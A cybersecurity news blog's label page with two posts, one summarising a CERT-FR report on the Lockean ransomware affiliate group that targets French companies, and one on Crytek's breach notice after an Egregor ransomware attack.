Search This Blog
Powered by Blogger.

Blog Archive

Labels

Load More
Trendy Right Now

Popular Posts

Showing posts with label Egregor. Show all posts
REvil
Cyber Threats Data Breach DoppelPaymer Egregor Lockean Maze Ransomware Network Threats RaaS Ransomware REvil

Lockean Multi-ransomware Hitting French Companies--CERT-FR

 

France’s Computer Emergency Response Team (CERT-FR) professionals identified details about the tools and tactics used by a ransomware affiliate group, named Lockean. Over the past two years, the cyber group is targeting French companies continuously. Reportedly, at least eight French companies’ suffered data breaches on a large scale. The group steals data and executes malware from multiple ransomware-as-a-service (RaaS) operations. 

According to the data, the companies that have been victimized by this group are the transportation logistics firm Gefco, the newspaper Ouest-France and the pharmaceutical groups Fareva and Pierre Fabre, among a few others. 

“Based on incidents reported to the ANSSI and their commonalities, investigations were carried out by the Agency to confirm the existence of a single cybercriminal group responsible for these incidents, understand its modus operandi and distinguish its techniques, tactics, and procedures (TTPs…” 

“…First observed in June 2020, this group named Lockean is thought to have affiliated with several Ransomware-as-a-Service (RaaS) including DoppelPaymer, Maze, Prolock, Egregor, and Sodinokibi. Lockean has a propensity to target French entities under a Big Game Hunting rationale), reads the report published by CERT-FR.” 

In 2020, Lockean was spotted for the very first time when the group targeted a French manufacturing company and executed DoppelPaymer ransomware on the network. Around June 2020 and March 2021, Lockean compromised at least seven more companies’ networks with various ransomware families including big names like Maze, Egregor, REvil, and ProLock. 

In most of the attacks, the hackers gained initial access to the victim network through Qbot/QakBot malware and post-exploitative tool CobaltStrike. Qbot/QakBot is a banking trojan that changed its role to spread other malware into the system, including ransomware strains ProLock, DoppelPaymer, and Egregor, CERT-FR officials said. 

The cybercriminal group had used the Emotet distribution service in 2020 and TA551 in 2020 and 2021 to distribute QakBot via phishing email. Additionally, the group used multiple tools for data exfiltration including AdFind, BITSAdmin, and BloodHound, and the RClone.
Read more »
Ransomware
Crytek Data Breach Egregor Egregor Ransomware Attacks Ransomware

Crytek Confirms Data Theft After Egregor Ransomware Attack

 

German game developer and publisher Crytek has accepted that its encrypted systems containing customers’ private details were breached by a ransomware gang known as Egregor who later leaked the same on the dark website. 

Earlier this month, Crytek sent out breach notification letters to the victims of the ransomware attack in which it acknowledges the ransomware attack that occurred in October 2020. The letter was shared with BleepingComputer by one of the customers impacted in the incident. 

"We want to inform you that Crytek was the victim of a ransomware attack by some unknown cyber-criminals. Ransomware is a form of malware that encrypts files on the systems of the attacked company. During that attack certain data had been encrypted and stolen from our network. We took immediate action to prevent the encryption of our systems, further secure our environment, and initiate an internal and external investigation into the incident," Crytek said in a letter mailed to one of their customers impacted by the encryption breach.

The company tried to reassure impacted individuals by saying "the website itself was difficult to identify, so that in our estimation, only very few people will have taken note of it." In addition to this, the enterprise also wrote that considering the size of the leaked data, it would have taken too long to download it anyway, which would probably have been a significant obstacle for individuals that wanted to get a hold of the data. 

The company also believes that those who attempted downloading the leaked data were discouraged by the "huge risk" of compromising their systems with malware embedded in the leaked documents.

Crytek's attempts to downplay the seriousness of the data breach don't hold water because attackers who really wanted to get their hands on leaked data would use a virtual machine and downloader to safely open what they download. The stolen data leaked by Egregor on their data leak website contained files related to WarFace, the cancelled Arena of Fate MOBA game, and documents that included information about their network operations.

So far, Egregor has targeted many well-known companies and organizations around the world, such as Barnes and Noble, Kmart, Cencosud, Randstad, and Vancouver’s TransLink metro system. In February, many members of the Egregor ransomware group were captured in Ukraine during a coordinated operation between the French and Ukrainian authorities. This happened because French law enforcement was successful in detecting some ransom payments that were transmitted to some people residing in Ukraine.
Read more »
Subscribe to: Posts (Atom)